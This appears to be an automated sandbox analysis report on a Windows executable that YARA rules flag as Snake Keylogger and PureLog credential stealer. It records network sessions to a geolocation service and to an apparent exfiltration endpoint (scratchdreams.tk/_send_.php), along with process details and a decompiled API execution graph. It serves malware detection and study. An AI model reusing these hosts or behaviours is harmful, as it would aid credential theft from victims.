                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYnDR4RxtVMUCqov6o0g1UXTWuqG3rElyt2E%2BrRKXm24qdSxvFrV3sOUMu5PbChdn%2B4j5wJXOlkxyT6S6IhQe6RDV1A8pLZkvUAEABXW9Hdx%2FkDoHcc7xeP0Qw%2Fl%2BVD0jny7FGg%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca7678e943aa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:25 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849716104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:25 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-05-02 06:00:26 UTC702INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:25 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 509
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8D4%2FQj2ogdfMGx6BOvExOS5IpLJ1CNKRnandqbhuNoPVu2vIR8Ub3bcviGqtvjj9NeciOceClNXxelQ6nlhc0VexYD%2F8Eme3dL9967CDyPtiXtisWNNKIzlRn58fpNMO8ZD2ssYc"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca7a69f941d8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:26 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.849718104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:28 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-05-02 06:00:28 UTC710INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:28 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 512
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5xzV7lbHb2iK8NsUid%2BKvXnESVMkvEjm9ojWfhsI0lTnb1ShRPjuHj3URd0J%2FwnNK32I0Hw0%2B%2FducsW%2BaP22IgSmNbXlQqkM0uSrf1bbcLZITfBmd40l28LxOG%2F3XaL8SSkdn8y"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca8be8c843ab-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:28 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.849720104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:29 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-05-02 06:00:30 UTC704INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:30 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 514
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UF6URGv8TlHoZhGZiZ3H4K45gdkkmw2fXOVApcA10u311mItF8wKSCcJed%2FPIKi09GenUTG6WUZUf6ExlkxPck6qkwTR98%2FNhFNj%2F8D0tkw3Twoz6LLSW6FgWa9YyR4kUruu6U20"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca93afe75e65-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:30 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.849722104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:31 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-05-02 06:00:31 UTC710INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:31 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 515
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBRCpGrLqPWWH8lPU%2BXXu9LhfIf5mYI7d9CmjzE%2BJ%2FGdfbo4IxU5nvu0Xenew7w9wp1yRP%2FAnaskExwVz4twfZa62xvdMri%2FIE3Ift9KHo2NCSfpnKIdSysNbLlFUa%2FdVuTxBbeH"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca9f3b3317b1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:31 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.849725104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:32 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-05-02 06:00:32 UTC700INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:32 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 516
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSZcC1i8Ya%2Fr6ZbKIZ4tm2nOlIwEp1ddKXu54RGBRCCjat06T8JIVAIItny8v5O0JTCKaCCy6WsBVsrO9XHqEgAv7LfWd3DlZnHShXXsqHLkFhKW2vNfsACm65gGS8y4OoGK9aEZ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5caa36be14401-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:32 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.849726104.21.27.854437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:32 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                              Host: scratchdreams.tk
                                                              Connection: Keep-Alive
                                                              2024-05-02 06:01:12 UTC735INHTTP/1.1 522
                                                              Date: Thu, 02 May 2024 06:01:12 GMT
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Content-Length: 15
                                                              Connection: close
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yx0Kc6wLIed6aJqNJXV6v9%2F1E1ztQV3DExMVFAOreMaaeGYXfGLRrMIY1my5HTMYmRrPYcG0XUmdvxNEXHgj6qyhKfJ85g%2BRI4FfMyH2s2RKXO7uj89qg%2BnOunLTx9CB7Yh6"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Frame-Options: SAMEORIGIN
                                                              Referrer-Policy: same-origin
                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 87d5caa73e477287-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:01:12 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                              Data Ascii: error code: 522


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:08:00:11
                                                              Start date:02/05/2024
                                                              Path:C:\Users\user\Desktop\DNXS-04-22.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DNXS-04-22.exe"
                                                              Imagebase:0x8c0000
                                                              File size:888'832 bytes
                                                              MD5 hash:64932C473D74FBDFDB706A094543CF37
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:08:00:12
                                                              Start date:02/05/2024
                                                              Path:C:\Users\user\Desktop\DNXS-04-22.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\DNXS-04-22.exe"
                                                              Imagebase:0x370000
                                                              File size:888'832 bytes
                                                              MD5 hash:64932C473D74FBDFDB706A094543CF37
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:08:00:12
                                                              Start date:02/05/2024
                                                              Path:C:\Users\user\Desktop\DNXS-04-22.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DNXS-04-22.exe"
                                                              Imagebase:0x6f0000
                                                              File size:888'832 bytes
                                                              MD5 hash:64932C473D74FBDFDB706A094543CF37
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:8.9%
                                                                Dynamic/Decrypted Code Coverage:99.2%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:399
                                                                Total number of Limit Nodes:22
                                                                execution_graph 57919 2c5d3c0 57920 2c5d406 57919->57920 57924 2c5d590 57920->57924 57927 2c5d5a0 57920->57927 57921 2c5d4f3 57930 2c5b034 57924->57930 57928 2c5d5ce 57927->57928 57929 2c5b034 DuplicateHandle 57927->57929 57928->57921 57929->57928 57931 2c5d608 DuplicateHandle 57930->57931 57932 2c5d5ce 57931->57932 57932->57921 57933 5e586c0 57934 5e586ed 57933->57934 57937 5e58140 57934->57937 57936 5e5887c 57938 5e5814b 57937->57938 57941 5e583a0 57938->57941 57940 5e5b0df 57940->57936 57942 5e583ab 57941->57942 57943 5e5b112 57942->57943 57945 2c574e8 57942->57945 57943->57940 57946 2c574f3 57945->57946 57948 2c58d73 57946->57948 57952 2c5ac12 57946->57952 57947 2c58db1 57947->57943 57948->57947 57956 2c5cce0 57948->57956 57961 2c5ccf0 57948->57961 57966 2c5b040 57952->57966 57970 2c5b050 57952->57970 57953 2c5ac26 57953->57948 57958 2c5ccf0 57956->57958 57957 2c5cd35 57957->57947 57958->57957 57993 2c5d298 57958->57993 57997 2c5d2a8 57958->57997 57963 2c5cd11 57961->57963 57962 2c5cd35 57962->57947 57963->57962 57964 2c5d298 4 API calls 57963->57964 57965 2c5d2a8 4 API calls 57963->57965 57964->57962 57965->57962 57967 2c5b050 57966->57967 57973 2c5b148 57967->57973 57968 2c5b05f 57968->57953 57972 2c5b148 2 API calls 57970->57972 57971 2c5b05f 57971->57953 57972->57971 57974 2c5b159 57973->57974 57976 2c5b17c 57973->57976 57974->57976 57981 2c5b3d1 57974->57981 57985 2c5b3e0 57974->57985 57975 2c5b174 57975->57976 57977 2c5b380 GetModuleHandleW 57975->57977 57976->57968 57978 2c5b3ad 57977->57978 57978->57968 57982 2c5b3e0 57981->57982 57983 2c5b419 57982->57983 57989 2c5ae58 57982->57989 57983->57975 57986 2c5b3f4 57985->57986 57987 2c5b419 57986->57987 57988 2c5ae58 LoadLibraryExW 57986->57988 57987->57975 57988->57987 57990 2c5b5a0 LoadLibraryExW 57989->57990 57992 2c5b619 57990->57992 57992->57983 57995 2c5d2b5 57993->57995 57994 2c5d2ef 57994->57957 57995->57994 58001 2c5d0d0 57995->58001 57999 2c5d2b5 57997->57999 57998 2c5d2ef 57998->57957 57999->57998 58000 2c5d0d0 4 API calls 57999->58000 58000->57998 58002 2c5d0db 58001->58002 58004 2c5dc00 58002->58004 58005 2c5d1ec 58002->58005 58006 2c5d1f7 58005->58006 58007 2c574e8 4 API calls 58006->58007 58008 2c5dc6f 58007->58008 58011 2c5f9fc 58008->58011 58012 2c5dca9 58011->58012 58013 2c5fa15 58011->58013 58012->58004 58019 5e509af 58013->58019 58024 5e509c0 58013->58024 58029 5e50948 58013->58029 58034 5e50978 58013->58034 58014 2c5fb01 58020 5e509b1 58019->58020 58021 5e50a9a 58020->58021 58039 5e51ca0 58020->58039 58042 5e51c90 58020->58042 58025 5e509e1 58024->58025 58026 5e50a9a 58025->58026 58027 5e51ca0 CreateWindowExW 58025->58027 58028 5e51c90 2 API calls 58025->58028 58027->58026 58028->58026 58030 5e5094b 58029->58030 58030->58014 58031 5e50983 58030->58031 58032 5e51ca0 CreateWindowExW 58030->58032 58033 5e51c90 2 API calls 58030->58033 58031->58014 58031->58031 58032->58031 58033->58031 58035 5e50979 58034->58035 58036 5e50983 58035->58036 58037 5e51ca0 CreateWindowExW 58035->58037 58038 5e51c90 2 API calls 58035->58038 58036->58014 58037->58036 58038->58036 58040 5e51110 CreateWindowExW 58039->58040 58041 5e51cd5 58040->58041 58041->58021 58043 5e51ca6 58042->58043 58044 5e51cde CreateWindowExW 58042->58044 58045 5e51cd5 58043->58045 58046 5e51110 CreateWindowExW 58043->58046 58048 5e51e14 58044->58048 58045->58021 58046->58045 58048->58048 58088 7fdfcc8 PostMessageW 58089 7fdfd34 58088->58089 58090 10dd1b4 58091 10dd1cc 58090->58091 58092 10dd226 58091->58092 58097 5e51e98 58091->58097 58101 5e51ea8 58091->58101 58105 5e52bf8 58091->58105 58114 5e5113c 58091->58114 58098 5e51ea8 58097->58098 58099 5e5113c CallWindowProcW 58098->58099 58100 5e51eef 58099->58100 58100->58092 58102 5e51ece 58101->58102 58103 5e5113c CallWindowProcW 58102->58103 58104 5e51eef 58103->58104 58104->58092 58106 5e52c08 58105->58106 58107 5e52c69 58106->58107 58109 5e52c59 58106->58109 58139 5e51264 58107->58139 58123 5e52d90 58109->58123 58128 5e52d80 58109->58128 58133 5e52e5c 58109->58133 58110 5e52c67 58115 5e51147 58114->58115 58116 5e52c69 58115->58116 58118 5e52c59 58115->58118 58117 5e51264 CallWindowProcW 58116->58117 58119 5e52c67 58117->58119 58120 5e52d80 CallWindowProcW 58118->58120 58121 5e52d90 CallWindowProcW 58118->58121 58122 5e52e5c CallWindowProcW 58118->58122 58120->58119 58121->58119 58122->58119 58125 5e52da4 58123->58125 58124 5e52e30 58124->58110 58143 5e52e48 58125->58143 58146 5e52e38 58125->58146 58129 5e52d90 58128->58129 58131 5e52e48 CallWindowProcW 58129->58131 58132 5e52e38 CallWindowProcW 58129->58132 58130 5e52e30 58130->58110 58131->58130 58132->58130 58134 5e52e1a 58133->58134 58135 5e52e6a 58133->58135 58137 5e52e48 CallWindowProcW 58134->58137 58138 5e52e38 CallWindowProcW 58134->58138 58136 5e52e30 58136->58110 58137->58136 58138->58136 58140 5e5126f 58139->58140 58141 5e5434a CallWindowProcW 58140->58141 58142 5e542f9 58140->58142 58141->58142 58142->58110 58144 5e52e59 58143->58144 58150 5e54281 58143->58150 58144->58124 58147 5e52e3b 58146->58147 58147->58147 58148 5e52e59 58147->58148 58149 5e54281 CallWindowProcW 58147->58149 58148->58124 58149->58148 58151 5e51264 CallWindowProcW 58150->58151 58152 5e5429a 58151->58152 58152->58144 58153 7f31f38 58155 2c574e8 4 API calls 58153->58155 58154 7f31f4b 58155->58154 58049 2c54668 58050 2c5467a 58049->58050 58051 2c54686 58050->58051 58055 2c54778 58050->58055 58060 2c53e40 58051->58060 58053 2c546a5 58056 2c5479d 58055->58056 58064 2c54879 58056->58064 58068 2c54888 58056->58068 58061 2c53e4b 58060->58061 58076 2c55c8c 58061->58076 58063 2c5708f 58063->58053 58065 2c54888 58064->58065 58066 2c5498c 58065->58066 58072 2c544c4 58065->58072 58070 2c548af 58068->58070 58069 2c5498c 58069->58069 58070->58069 58071 2c544c4 CreateActCtxA 58070->58071 58071->58069 58073 2c55918 CreateActCtxA 58072->58073 58075 2c559cf 58073->58075 58077 2c55c97 58076->58077 58080 2c55e64 58077->58080 58079 2c5793d 58079->58063 58081 2c55e6f 58080->58081 58084 2c574b8 58081->58084 58083 2c57a1a 58083->58079 58085 2c574c3 58084->58085 58086 2c574e8 4 API calls 58085->58086 58087 2c57b0d 